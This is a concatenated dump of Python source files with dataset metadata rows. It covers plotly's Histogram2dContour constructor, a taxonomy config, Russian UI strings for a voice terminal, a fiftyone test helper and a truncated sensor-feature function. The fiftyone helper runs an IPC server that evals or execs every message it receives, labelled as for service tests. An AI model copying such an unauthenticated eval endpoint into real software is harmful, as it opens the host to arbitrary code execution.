using d3-format's syntax %{variable:d3-format}, for
example "Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format
for details on the formatting syntax. Dates are
formatted using d3-time-format's syntax
%{variable|d3-time-format}, for example "Day:
%{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the
date formatting syntax. The variables available in
`hovertemplate` are the ones emitted as event data
described at this link
https://plotly.com/javascript/plotlyjs-events/#event-
data. Additionally, every attribute that can be
specified per-point (the ones that are `arrayOk: true`)
is available. Finally, the template string has access to
the variable `z`. Anything contained in the tag
`<extra>` is displayed in the secondary box, for
example "<extra>{fullData.name}</extra>". To hide the
secondary box completely, use an empty tag
`<extra></extra>`.
hovertemplatesrc
Sets the source reference on Chart Studio Cloud for
`hovertemplate`.
ids
Assigns id labels to each datum. These ids are used for
object constancy of data points during animation. Should
be an array of strings, not numbers or any other type.
idssrc
Sets the source reference on Chart Studio Cloud for
`ids`.
legendgroup
Sets the legend group for this trace. Traces part of
the same legend group hide/show at the same time when
toggling legend items.
legendgrouptitle
:class:`plotly.graph_objects.histogram2dcontour.Legendg
rouptitle` instance or dict with compatible properties
legendrank
Sets the legend rank for this trace. Items and groups
with smaller ranks are presented on top/left side while
with *reversed* `legend.traceorder` they are on
bottom/right side. The default legendrank is 1000, so
that you can use ranks less than 1000 to place certain
items before all unranked items, and ranks greater than
1000 to go after all unranked items.
line
:class:`plotly.graph_objects.histogram2dcontour.Line`
instance or dict with compatible properties
marker
:class:`plotly.graph_objects.histogram2dcontour.Marker`
instance or dict with compatible properties
meta
Assigns extra meta information associated with this
trace that can be used in various text attributes.
Attributes such as trace `name`, graph, axis and
colorbar `title.text`, annotation `text`,
`rangeselector`, `updatemenus` and `sliders` `label`
text all support `meta`. To access the trace `meta`
values in an attribute in the same trace, simply use
`%{meta[i]}` where `i` is the index or key of the
`meta` item in question. To access trace `meta` in
layout attributes, use `%{data[n].meta[i]}` where `i`
is the index or key of the `meta` and `n` is the trace
index.
metasrc
Sets the source reference on Chart Studio Cloud for
`meta`.
name
Sets the trace name. The trace name appears as the
legend item and on hover.
nbinsx
Specifies the maximum number of desired bins. This
value will be used in an algorithm that will decide the
optimal bin size such that the histogram best
visualizes the distribution of the data. Ignored if
`xbins.size` is provided.
nbinsy
Specifies the maximum number of desired bins. This
value will be used in an algorithm that will decide the
optimal bin size such that the histogram best
visualizes the distribution of the data. Ignored if
`ybins.size` is provided.
ncontours
Sets the maximum number of contour levels. The actual
number of contours will be chosen automatically to be
less than or equal to the value of `ncontours`. Has an
effect only if `autocontour` is True or if
`contours.size` is missing.
opacity
Sets the opacity of the trace.
reversescale
Reverses the color mapping if true. If true, `zmin`
will correspond to the last color in the array and
`zmax` will correspond to the first color.
showlegend
Determines whether or not an item corresponding to this
trace is shown in the legend.
showscale
Determines whether or not a colorbar is displayed for
this trace.
stream
:class:`plotly.graph_objects.histogram2dcontour.Stream`
instance or dict with compatible properties
textfont
For this trace it only has an effect if `coloring` is
set to "heatmap". Sets the text font.
texttemplate
For this trace it only has an effect if `coloring` is
set to "heatmap". Template string used for rendering
the information text that appears on points. Note that
this will override `textinfo`. Variables are inserted
using %{variable}, for example "y: %{y}". Numbers are
formatted using d3-format's syntax
%{variable:d3-format}, for example "Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format
for details on the formatting syntax. Dates are
formatted using d3-time-format's syntax
%{variable|d3-time-format}, for example "Day:
%{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the
date formatting syntax. Every attribute that can be
specified per-point (the ones that are `arrayOk: true`)
is available. Finally, the template string has access to
the variables `x`, `y`, `z` and `text`.
uid
Assign an id to this trace. Use this to provide object
constancy between traces during animations and
transitions.
uirevision
Controls persistence of some user-driven changes to the
trace: `constraintrange` in `parcoords` traces, as well
as some `editable: true` modifications such as `name`
and `colorbar.title`. Defaults to `layout.uirevision`.
Note that other user-driven trace attribute changes are
controlled by `layout` attributes: `trace.visible` is
controlled by `layout.legend.uirevision`,
`selectedpoints` is controlled by
`layout.selectionrevision`, and `colorbar.(x|y)`
(accessible with `config: {editable: true}`) is
controlled by `layout.editrevision`. Trace changes are
tracked by `uid`, which only falls back on trace index
if no `uid` is provided. So if your app can add/remove
traces before the end of the `data` array, such that
the same trace has a different index, you can still
preserve user-driven changes if you give each trace a
`uid` that stays with it as it moves.
visible
Determines whether or not this trace is visible. If
"legendonly", the trace is not drawn, but can appear as
a legend item (provided that the legend itself is
visible).
x
Sets the sample data to be binned on the x axis.
xaxis
Sets a reference between this trace's x coordinates and
a 2D cartesian x axis. If "x" (the default value), the
x coordinates refer to `layout.xaxis`. If "x2", the x
coordinates refer to `layout.xaxis2`, and so on.
xbingroup
Set a group of histogram traces which will have
compatible x-bin settings. Using `xbingroup`,
histogram2d and histogram2dcontour traces (on axes of
the same axis type) can have compatible x-bin settings.
Note that the same `xbingroup` value can be used to set
(1D) histogram `bingroup`
xbins
:class:`plotly.graph_objects.histogram2dcontour.XBins`
instance or dict with compatible properties
xcalendar
Sets the calendar system to use with `x` date data.
xhoverformat
Sets the hover text formatting rule for `x` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.
And for dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to
d3's date formatter: "%h" for half of the year as a
decimal number as well as "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display *09~15~23.46*. By default the values are
formatted using `xaxis.hoverformat`.
xsrc
Sets the source reference on Chart Studio Cloud for
`x`.
y
Sets the sample data to be binned on the y axis.
yaxis
Sets a reference between this trace's y coordinates and
a 2D cartesian y axis. If "y" (the default value), the
y coordinates refer to `layout.yaxis`. If "y2", the y
coordinates refer to `layout.yaxis2`, and so on.
ybingroup
Set a group of histogram traces which will have
compatible y-bin settings. Using `ybingroup`,
histogram2d and histogram2dcontour traces (on axes of
the same axis type) can have compatible y-bin settings.
Note that the same `ybingroup` value can be used to set
(1D) histogram `bingroup`
ybins
:class:`plotly.graph_objects.histogram2dcontour.YBins`
instance or dict with compatible properties
ycalendar
Sets the calendar system to use with `y` date data.
yhoverformat
Sets the hover text formatting rule for `y` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.
And for dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to
d3's date formatter: "%h" for half of the year as a
decimal number as well as "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display *09~15~23.46*. By default the values are
formatted using `yaxis.hoverformat`.
ysrc
Sets the source reference on Chart Studio Cloud for
`y`.
z
Sets the aggregation data.
zauto
Determines whether or not the color domain is computed
with respect to the input data (here in `z`) or the
bounds set in `zmin` and `zmax` Defaults to `false`
when `zmin` and `zmax` are set by the user.
zhoverformat
Sets the hover text formatting rule for `z` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.
By default the values are formatted using generic
number format.
zmax
Sets the upper bound of the color domain. Value should
have the same units as in `z` and if set, `zmin` must
be set as well.
zmid
Sets the mid-point of the color domain by scaling
`zmin` and/or `zmax` to be equidistant to this point.
Value should have the same units as in `z`. Has no
effect when `zauto` is `false`.
zmin
Sets the lower bound of the color domain. Value should
have the same units as in `z` and if set, `zmax` must
be set as well.
zsrc
Sets the source reference on Chart Studio Cloud for
`z`.
Returns
-------
Histogram2dContour
"""
super(Histogram2dContour, self).__init__("histogram2dcontour")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.Histogram2dContour
constructor must be a dict or
an instance of :class:`plotly.graph_objs.Histogram2dContour`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
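# Note: an explicitly passed keyword argument takes precedence over the
# corresponding entry popped from `arg`, as each
# `_v = <kwarg> if <kwarg> is not None else _v` line below shows.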
_v = arg.pop("autobinx", None)
_v = autobinx if autobinx is not None else _v
if _v is not None:
self["autobinx"] = _v
_v = arg.pop("autobiny", None)
_v = autobiny if autobiny is not None else _v
if _v is not None:
self["autobiny"] = _v
_v = arg.pop("autocolorscale", None)
_v = autocolorscale if autocolorscale is not None else _v
if _v is not None:
self["autocolorscale"] = _v
_v = arg.pop("autocontour", None)
_v = autocontour if autocontour is not None else _v
if _v is not None:
self["autocontour"] = _v
_v = arg.pop("bingroup", None)
_v = bingroup if bingroup is not None else _v
if _v is not None:
self["bingroup"] = _v
_v = arg.pop("coloraxis", None)
_v = coloraxis if coloraxis is not None else _v
if _v is not None:
self["coloraxis"] = _v
_v = arg.pop("colorbar", None)
_v = colorbar if colorbar is not None else _v
if _v is not None:
self["colorbar"] = _v
_v = arg.pop("colorscale", None)
_v = colorscale if colorscale is not None else _v
if _v is not None:
self["colorscale"] = _v
_v = arg.pop("contours", None)
_v = contours if contours is not None else _v
if _v is not None:
self["contours"] = _v
_v = arg.pop("customdata", None)
_v = customdata if customdata is not None else _v
if _v is not None:
self["customdata"] = _v
_v = arg.pop("customdatasrc", None)
_v = customdatasrc if customdatasrc is not None else _v
if _v is not None:
self["customdatasrc"] = _v
_v = arg.pop("histfunc", None)
_v = histfunc if histfunc is not None else _v
if _v is not None:
self["histfunc"] = _v
_v = arg.pop("histnorm", None)
_v = histnorm if histnorm is not None else _v
if _v is not None:
self["histnorm"] = _v
_v = arg.pop("hoverinfo", None)
_v = hoverinfo if hoverinfo is not None else _v
if _v is not None:
self["hoverinfo"] = _v
_v = arg.pop("hoverinfosrc", None)
_v = hoverinfosrc if hoverinfosrc is not None else _v
if _v is not None:
self["hoverinfosrc"] = _v
_v = arg.pop("hoverlabel", None)
_v = hoverlabel if hoverlabel is not None else _v
if _v is not None:
self["hoverlabel"] = _v
_v = arg.pop("hovertemplate", None)
_v = hovertemplate if hovertemplate is not None else _v
if _v is not None:
self["hovertemplate"] = _v
_v = arg.pop("hovertemplatesrc", None)
_v = hovertemplatesrc if hovertemplatesrc is not None else _v
if _v is not None:
self["hovertemplatesrc"] = _v
_v = arg.pop("ids", None)
_v = ids if ids is not None else _v
if _v is not None:
self["ids"] = _v
_v = arg.pop("idssrc", None)
_v = idssrc if idssrc is not None else _v
if _v is not None:
self["idssrc"] = _v
_v = arg.pop("legendgroup", None)
_v = legendgroup if legendgroup is not None else _v
if _v is not None:
self["legendgroup"] = _v
_v = arg.pop("legendgrouptitle", None)
_v = legendgrouptitle if legendgrouptitle is not None else _v
if _v is not None:
self["legendgrouptitle"] = _v
_v = arg.pop("legendrank", None)
_v = legendrank if legendrank is not None else _v
if _v is not None:
self["legendrank"] = _v
_v = arg.pop("line", None)
_v = line if line is not None else _v
if _v is not None:
self["line"] = _v
_v = arg.pop("marker", None)
_v = marker if marker is not None else _v
if _v is not None:
self["marker"] = _v
_v = arg.pop("meta", None)
_v = meta if meta is not None else _v
if _v is not None:
self["meta"] = _v
_v = arg.pop("metasrc", None)
_v = metasrc if metasrc is not None else _v
if _v is not None:
self["metasrc"] = _v
_v = arg.pop("name", None)
_v = name if name is not None else _v
if _v is not None:
self["name"] = _v
_v = arg.pop("nbinsx", None)
_v = nbinsx if nbinsx is not None else _v
if _v is not None:
self["nbinsx"] = _v
_v = arg.pop("nbinsy", None)
_v = nbinsy if nbinsy is not None else _v
if _v is not None:
self["nbinsy"] = _v
_v = arg.pop("ncontours", None)
_v = ncontours if ncontours is not None else _v
if _v is not None:
self["ncontours"] = _v
_v = arg.pop("opacity", None)
_v = opacity if opacity is not None else _v
if _v is not None:
self["opacity"] = _v
_v = arg.pop("reversescale", None)
_v = reversescale if reversescale is not None else _v
if _v is not None:
self["reversescale"] = _v
_v = arg.pop("showlegend", None)
_v = showlegend if showlegend is not None else _v
if _v is not None:
self["showlegend"] = _v
_v = arg.pop("showscale", None)
_v = showscale if showscale is not None else _v
if _v is not None:
self["showscale"] = _v
_v = arg.pop("stream", None)
_v = stream if stream is not None else _v
if _v is not None:
self["stream"] = _v
_v = arg.pop("textfont", None)
_v = textfont if textfont is not None else _v
if _v is not None:
self["textfont"] = _v
_v = arg.pop("texttemplate", None)
_v = texttemplate if texttemplate is not None else _v
if _v is not None:
self["texttemplate"] = _v
_v = arg.pop("uid", None)
_v = uid if uid is not None else _v
if _v is not None:
self["uid"] = _v
_v = arg.pop("uirevision", None)
_v = uirevision if uirevision is not None else _v
if _v is not None:
self["uirevision"] = _v
_v = arg.pop("visible", None)
_v = visible if visible is not None else _v
if _v is not None:
self["visible"] = _v
_v = arg.pop("x", None)
_v = x if x is not None else _v
if _v is not None:
self["x"] = _v
_v = arg.pop("xaxis", None)
_v = xaxis if xaxis is not None else _v
if _v is not None:
self["xaxis"] = _v
_v = arg.pop("xbingroup", None)
_v = xbingroup if xbingroup is not None else _v
if _v is not None:
self["xbingroup"] = _v
_v = arg.pop("xbins", None)
_v = xbins if xbins is not None else _v
if _v is not None:
self["xbins"] = _v
_v = arg.pop("xcalendar", None)
_v = xcalendar if xcalendar is not None else _v
if _v is not None:
self["xcalendar"] = _v
_v = arg.pop("xhoverformat", None)
_v = xhoverformat if xhoverformat is not None else _v
if _v is not None:
self["xhoverformat"] = _v
_v = arg.pop("xsrc", None)
_v = xsrc if xsrc is not None else _v
if _v is not None:
self["xsrc"] = _v
_v = arg.pop("y", None)
_v = y if y is not None else _v
if _v is not None:
self["y"] = _v
_v = arg.pop("yaxis", None)
_v = yaxis if yaxis is not None else _v
if _v is not None:
self["yaxis"] = _v
_v = arg.pop("ybingroup", None)
_v = ybingroup if ybingroup is not None else _v
if _v is not None:
self["ybingroup"] = _v
_v = arg.pop("ybins", None)
_v = ybins if ybins is not None else _v
if _v is not None:
self["ybins"] = _v
_v = arg.pop("ycalendar", None)
_v = ycalendar if ycalendar is not None else _v
if _v is not None:
self["ycalendar"] = _v
_v = arg.pop("yhoverformat", None)
_v = yhoverformat if yhoverformat is not None else _v
if _v is not None:
self["yhoverformat"] = _v
_v = arg.pop("ysrc", None)
_v = ysrc if ysrc is not None else _v
if _v is not None:
self["ysrc"] = _v
_v = arg.pop("z", None)
_v = z if z is not None else _v
if _v is not None:
self["z"] = _v
_v = arg.pop("zauto", None)
_v = zauto if zauto is not None else _v
if _v is not None:
self["zauto"] = _v
_v = arg.pop("zhoverformat", None)
_v = zhoverformat if zhoverformat is not None else _v
if _v is not None:
self["zhoverformat"] = _v
_v = arg.pop("zmax", None)
_v = zmax if zmax is not None else _v
if _v is not None:
self["zmax"] = _v
_v = arg.pop("zmid", None)
_v = zmid if zmid is not None else _v
if _v is not None:
self["zmid"] = _v
_v = arg.pop("zmin", None)
_v = zmin if zmin is not None else _v
if _v is not None:
self["zmin"] = _v
_v = arg.pop("zsrc", None)
_v = zsrc if zsrc is not None else _v
if _v is not None:
self["zsrc"] = _v
# Read-only literals
# ------------------
self._props["type"] = "histogram2dcontour"
arg.pop("type", None)
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
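# --- Illustrative usage sketch (not part of the generated class) ------------------
# The keyword arguments below map onto the properties validated in __init__ above
# (per the docstring, `zmin`/`zmax` must be supplied together). The sample data and
# the plotly.graph_objects import are assumptions made only for this example.
#
#   import numpy as np
#   import plotly.graph_objects as go
#
#   rng = np.random.default_rng(0)
#   x, y = rng.normal(size=500), rng.normal(size=500)
#   trace = go.Histogram2dContour(
#       x=x, y=y,
#       colorscale="Viridis",
#       ncontours=20,
#       zmin=0, zmax=25,   # zmin and zmax are set together
#   )
#   go.Figure(trace).show()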
| 37.934111 | 89 | 0.557871 | [
"MIT"
] | labaran1/plotly.py | packages/python/plotly/plotly/graph_objs/_histogram2dcontour.py | 120,327 | Python |
"""
Some settings for the config files
"""
# defaultdir = '/data/ncbi/taxonomy/current'
# defaultdir = '/home/edwa0468/ncbi/taxonomy'
defaultdir = '/raid60/usr/data/NCBI/taxonomy/current/'
def get_db_dir():
"""
Just return the default dir listed above
    :return: the default location for the sqlite database
"""
return defaultdir
| 23.4 | 58 | 0.700855 | [
"MIT"
] | linsalrob/EdwardsLab | taxon/config.py | 351 | Python |
# Generated by scripts/localization_gen.py
def _config_pretty_models(_, count):
ot = 'о'
if count == 1:
et = 'ь'
ot = 'а'
elif count in [2, 3, 4]:
et = 'и'
else:
et = 'ей'
pretty = ['ноль', 'одна', 'две', 'три', 'четыре', 'пять', 'шесть']
count = pretty[count] if count < 7 else count
return 'Загружен{} {} модел{}'.format(ot, count, et)
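# Example outputs of the pluralisation helper above (values follow directly from the code):
#   _config_pretty_models(None, 1) -> 'Загружена одна модель'
#   _config_pretty_models(None, 5) -> 'Загружено пять моделей'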
LANG_CODE = {
'IETF': 'ru-RU',
'ISO': 'ru',
'aws': 'ru-RU',
}
YANDEX_EMOTION = {
'good': 'добрая',
'neutral': 'нейтральная',
'evil': 'злая',
}
YANDEX_SPEAKER = {
'jane': 'Джейн',
'oksana': 'Оксана',
'alyss': 'Алиса',
'omazh': 'Омар',
'zahar': 'Захар',
'ermil': 'Саня',
}
RHVOICE_SPEAKER = {
'anna': 'Аня',
'aleksandr': 'Александр',
'elena': 'Елена',
'irina': 'Ирина',
}
AWS_SPEAKER = {
'Tatyana': 'Татьяна',
'Maxim': 'Максим',
}
_LNG = {
# config.py
'Ошибка получения ключа для Yandex: {}': None,
'Ошибка сохранения {}: {}': None,
'Файл не найден (это нормально): {}': None,
'Ошибка загрузки {}: {}': None,
'Конфигурация сохранена за {}': None,
'Конфигурация сохранена!': None,
'Директория с моделями не найдена {}': None,
'Загружено {} моделей': _config_pretty_models,
'Файл настроек не найден по пути {}. Для первого запуска это нормально': None,
'Загружено {} опций за {}': None,
'Конфигурация загружена!': None,
'Ошибка инициализации языка {}: {}': None,
'Локализация {} загружена за {}': None,
'Конфигурация изменилась': None,
'Конфигурация не изменилась': None,
'Директория c tts кэшем не найдена {}': None,
'Удалены поврежденные файлы: {}': None,
'Размер tts кэша {}: {}': None,
'Ок.': None,
'Удаляем...': None,
'Удалено: {}': None,
'Удалено {} файлов. Новый размер TTS кэша {}': None,
'Директория {} не найдена. Создаю...': None,
# config.py terminal.py player.py
'Файл {} не найден.': None,
# config.py
'Это надо исправить!': None,
'Терминал еще не настроен, мой IP адрес: {}': None,
# listener.py stts.py
'Распознано за {}': None,
# listener.py
'Записано за {}': None,
'{} слушает': None,
'Голосовая активация по {}{}': None,
# loader.py
'Приветствую. Голосовой терминал настраивается, три... два... один...': None,
'Голосовой терминал завершает свою работу.': None,
# modules_manager.py
'Обычный': None,
# modules_manager.py modules.py
'Отладка': None,
# modules_manager.py
'Любой': None,
'восстановлен': None,
'удален': None,
'Отключенные модули: {}': None,
'Неактивные модули: {}': None,
'Активные модули: {}': None,
'Обнаружены конфликты в режиме {}: {}': None,
# modules_manager.py modules.py
'Вы ничего не сказали?': None,
# modules_manager.py
'Захвачено {}': None,
# terminal.py
'Пустая очередь? Impossible!': None,
'Получено {}:{}, lvl={} опоздание {} секунд.': None,
'{} Игнорирую.': None,
'Не верный вызов, WTF? {}:{}, lvl={}': None,
'Недопустимое значение: {}': None,
'Не настроено': None,
'Громкость {} процентов': None,
'Громкость музыки {} процентов': None,
'{} не поддерживает запись образцов.': None,
'первого': None,
'второго': None,
'третьего': None,
'Ошибка записи - недопустимый параметр': None,
'Запись {} образца на 5 секунд начнется после звукового сигнала': None,
'Запись {} образца завершена. Вы можете прослушать свою запись.': None,
'Ошибка сохранения образца {}: {}': None,
'Ошибка воспроизведения - файл {} не найден': None,
'{} не поддерживает тренировку моделей.': None,
' и еще {}': None,
'Ошибка компиляции - файлы {} не найдены в {}.': None,
'Ошибка компиляции - файлы не найдены.': None,
'Ошибка удаление модели номер {}': None,
'Модель номер {} удалена': None,
'Модель номер {} не найдена': None,
'Полный консенсус по модели {} не достигнут [{}/{}]. Советую пересоздать модель.': None,
'Полный консенсус по модели {} не достигнут. Компиляция отменена.': None,
'Компилирую {}': None,
'Ошибка компиляции модели {}: {}': None,
'Ошибка компиляции модели номер {}': None,
'Модель{} скомпилирована успешно за {}: {}': None,
'Модель{} номер {} скомпилирована успешно за {}': None,
# logger.py
'Логгирование в {} невозможно - отсутствуют права на запись. Исправьте это': None,
# modules.py
'блокировка': None,
'Блокировка снята': None,
'Блокировка включена': None,
'Блокировка': None,
'Включение/выключение блокировки терминала': None,
'выход': None,
'Внимание! Выход из режима разработчика': None,
'режим разработчика': None,
"Внимание! Включён режим разработчика. Для возврата в обычный режим скажите 'выход'": None,
'Режим настройки и отладки': None,
'Модуль {} не найден': None,
'Модуль {} системный, его нельзя настраивать': None,
'активировать': None,
'деактивировать': None,
'активировать везде': None,
'удалить': None,
'восстановить': None,
'Модуль {} удален. Вначале его нужно восстановить': None,
'Модуль {} уже в режиме {}': None,
'Теперь модуль {} доступен в режиме {}': None,
'Модуль {} и так {}': None,
'Модуль {} {}': None,
'Это невозможно, откуда тут {}': None,
'Менеджер': None,
'Управление модулями': None,
'Скажи': None,
'Произнесение фразы': None,
'Ничего': None,
'минус': None,
'плюс': None,
'до': None,
'от': None,
'Это слишком много для меня - считать {} чисел.': None,
'Я всё сосчитала': None,
'считалка': None,
'Считалка до числа. Или от числа до числа. Считалка произносит не больше 20 чисел за раз': None,
'сосчитай': None,
'считай': None,
'посчитай': None,
'Ошибка': None,
'Не поддерживается для {}': None,
' Я очень {}.': None,
'Меня зовут {}.{}': None,
'Кто я': None,
'Получение информации о настройках голосового генератора (только для Яндекса и RHVoice)': None,
'кто ты': None,
'какая ты': None,
'Теперь я': None,
'Изменение характера или голоса голосового генератора (только для Яндекса и RHVoice)': None,
'теперь ты': None,
'стань': None,
'Я уже {}.': None,
'Теперь меня зовут {}, а еще я {}.': None,
'без характера': None,
'Теперь я очень {} {}.': None,
'о': None,
'про': None,
'в': None,
'Ищу в вики о {}': None,
'Уточните свой вопрос: {}': None,
'Я ничего не знаю о {}.': None,
'Вики': None,
'Поиск в Википедии': None,
'расскажи': None,
'что ты знаешь': None,
'кто такой': None,
'что такое': None,
'зачем нужен': None,
'для чего': None,
'любую фразу': None,
'. Модуль удален': None,
'Модуль {} доступен в режиме {}. Для активации скажите {}. Модуль предоставляет {} {}': None,
'Скажите {}. Это активирует {}. Модуль предоставляет {}': None,
'Всего доступно {} модулей. Вот они:': None,
'Всего {} модулей удалены, это: {}': None,
'Работа модуля помощь завершена.': None,
'Помощь': None,
'Справку по модулям (вот эту)': None,
'помощь': None,
'справка': None,
'help': None,
'хелп': None,
'Come Along With Me.': None,
'Выход': None,
'Завершение работы голосового терминала': None,
'завершение работы': None,
'завершить работу': None,
'завершить': None,
'Терминал перезагрузится через 5... 4... 3... 2... 1...': None,
'Перезагрузка': None,
'Перезапуск голосового терминала': None,
'Ребут': None,
'Рестарт': None,
'reboot': None,
'громкость': None,
'Изменение громкости': None,
'громкость музыки': None,
'IP сервера не задан.': None,
'IP сервера не задан, исправьте это! Мой IP адрес: {}': None,
'Невозможно доставить - маршрут не найден': None,
'Скажи ': None,
'Мажордом': None,
'Отправку команд на сервер': None,
'Соответствие фразе не найдено: {}': None,
'Терминатор': None,
'Информацию что соответствие фразе не найдено': None,
# stts.py
'Неизвестный провайдер: {}': None,
'{} за {}{}: {}': None,
'{}найдено в кэше': None,
'{}сгенерированно {}': None,
"Ошибка синтеза речи от {}, ключ '{}'. ({})": None,
'Микрофоны не найдены': None,
'Доступны {}, от 0 до {}.': None,
'Не верный индекс микрофона {}. {}': None,
'Голос записан за {}': None,
'Во время записи произошел сбой, это нужно исправить': None,
'Ошибка распознавания - неизвестный провайдер {}': None,
'Для распознавания используем {}': None,
'Произошла ошибка распознавания': None,
"Ошибка распознавания речи от {}, ключ '{}'. ({})": None,
'Распознано: {}. Консенсус: {}': None,
'Привет': None,
'Слушаю': None,
'На связи': None,
'Привет-Привет': None,
'Я ничего не услышала': None,
'Вы ничего не сказали': None,
'Ничего не слышно': None,
'Не поняла': None,
'Ничего не слышно, повторите ваш запрос': None,
# notifier.py
'Запрос был успешен: {}': None,
'Ошибка коммуникации с сервером: {}': None,
# player.py
'Неизвестный тип файла: {}': None,
'Играю {} ...': None,
'Стримлю {} ...': None,
# updater.py
'Выполнен откат.': None,
'Во время обновления возникла ошибка': None,
'Вы используете последнюю версию терминала.': None,
'Файлы обновлены: {}': None,
'Терминал успешно обновлен.': None,
'Требуется перезапуск.': None,
'Во время обработки обновления или установки зависимостей возникла ошибка': None,
'Выполняется откат обновления.': None,
'Во время отката обновления возникла ошибка: {}': None,
'Откат невозможен.': None,
'Откат обновления выполнен успешно.': None,
'Зависимости {} {}обновлены: {}': None,
'не ': None,
# server.py
'Ошибка запуска сервера{}.': None,
' - адрес уже используется': None,
'Ошибка запуска сервера на {}:{}: {}': None,
# backup.py
'Запущено восстановление из бэкапа {}...': None,
'Восстановление не возможно: {}': None,
'Восстановление не удалось: {}': None,
'бэкап не создан': None,
'Восстановление завершено за {}, восстановлено {} файлов': None,
'Демон еще работает': None,
'Некорректное имя файла: {}': None,
'Файл не найден: {}': None,
'Архив поврежден: {}: {}': None,
'Ошибка создания бэкапа': None,
'Файл {} уже существует, отмена.': None,
'файл уже существует': None,
'Бэкап {} создан за {} [size: {}, compressed: {}, rate: {}%]': None,
'Бэкап успешно создан': None,
'Ошибка удаления старого бэкапа {}: {}': None,
'Удален старый бэкап {}': None,
# lib/base_music_controller.py
'Ошибка подключения к {}-серверу': None,
}
| 33.820189 | 100 | 0.598265 | [
"Apache-2.0",
"MIT"
] | Aculeasis/mdmTerminal2 | src/languages/ru.py | 15,427 | Python |
"""
A script that simulates a Python shell and accepts arbitrary commands to
execute. For use by service tests.
| Copyright 2017-2022, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import os
os.environ["FIFTYONE_DISABLE_SERVICES"] = "1"
from fiftyone.service.ipc import IPCServer
env = {}
def handle_message(message):
try:
code = compile(message, "", "eval")
except SyntaxError:
code = compile(message, "", "exec")
return eval(code, env)
IPCServer(handle_message).serve_forever()
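# Behaviour sketch, derived from handle_message above: expressions are eval'ed and
# their value is returned; statements fall back to the exec path and return None,
# while any names they create persist in the shared `env` dict between messages.
#
#   handle_message("1 + 1")        # -> 2
#   handle_message("x = 40 + 2")   # -> None
#   handle_message("x")            # -> 42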
| 19.62963 | 72 | 0.688679 | [
"Apache-2.0"
] | 3Demonica/fiftyone | tests/utils/interactive_python.py | 530 | Python |
from typing import List
import numpy as np
import pandas as pd
from pyspark.sql.functions import pandas_udf, PandasUDFType
from pyspark.sql.types import *
# from pyspark.sql.functions import pandas_udf,PandasUDFType
from pyspark.sql.types import StructType
from cerebralcortex.core.datatypes import DataStream
from cerebralcortex.core.metadata_manager.stream.metadata import Metadata
def compute_corr_mse_accel_gyro(self, exclude_col_names: list = [],
accel_column_names: list = ['accelerometer_x', 'accelerometer_y', 'accelerometer_z'],
gyro_column_names: list = ['gyroscope_y', 'gyroscope_x', 'gyroscope_z'],
windowDuration: int = None,
slideDuration: int = None,
groupByColumnName: List[str] = [], startTime=None):
"""
    Compute correlation and mean squared error of accel and gyro sensors
Args:
exclude_col_names list(str): name of the columns on which features should not be computed
accel_column_names list(str): name of accel data column
gyro_column_names list(str): name of gyro data column
windowDuration (int): duration of a window in seconds
slideDuration (int): slide duration of a window
groupByColumnName List[str]: groupby column names, for example, groupby user, col1, col2
startTime (datetime): The startTime is the offset with respect to 1970-01-01 00:00:00 UTC with which to start window intervals. For example, in order to have hourly tumbling windows that start 15 minutes past the hour, e.g. 12:15-13:15, 13:15-14:15... provide startTime as 15 minutes. First time of data will be used as startTime if none is provided
Returns:
DataStream object with all the existing data columns and FFT features
"""
feature_names = ["ax_ay_corr", 'ax_az_corr', 'ay_az_corr', 'gx_gy_corr', 'gx_gz_corr',
'gy_gz_corr', 'ax_ay_mse', 'ax_az_mse', 'ay_az_mse', 'gx_gy_mse', 'gx_gz_mse', 'gy_gz_mse']
exclude_col_names.extend(["timestamp", "localtime", "user", "version"])
data = self._data.drop(*exclude_col_names)
basic_schema = StructType([
StructField("timestamp", TimestampType()),
StructField("localtime", TimestampType()),
StructField("user", StringType()),
StructField("version", IntegerType()),
StructField("start_time", TimestampType()),
StructField("end_time", TimestampType())
])
features_list = []
for fn in feature_names:
features_list.append(StructField(fn, FloatType(), True))
features_schema = StructType(basic_schema.fields + features_list)
@pandas_udf(features_schema, PandasUDFType.GROUPED_MAP)
def get_corr_mse_features_udf(df):
timestamp = df['timestamp'].iloc[0]
localtime = df['localtime'].iloc[0]
user = df['user'].iloc[0]
version = df['version'].iloc[0]
start_time = timestamp
end_time = df['timestamp'].iloc[-1]
ax_ay_corr = df[accel_column_names[0]].corr(df[accel_column_names[1]])
ax_az_corr = df[accel_column_names[0]].corr(df[accel_column_names[2]])
ay_az_corr = df[accel_column_names[1]].corr(df[accel_column_names[2]])
gx_gy_corr = df[gyro_column_names[0]].corr(df[gyro_column_names[1]])
gx_gz_corr = df[gyro_column_names[0]].corr(df[gyro_column_names[2]])
gy_gz_corr = df[gyro_column_names[1]].corr(df[gyro_column_names[2]])
ax_ay_mse = ((df[accel_column_names[0]] - df[accel_column_names[1]]) ** 2).mean()
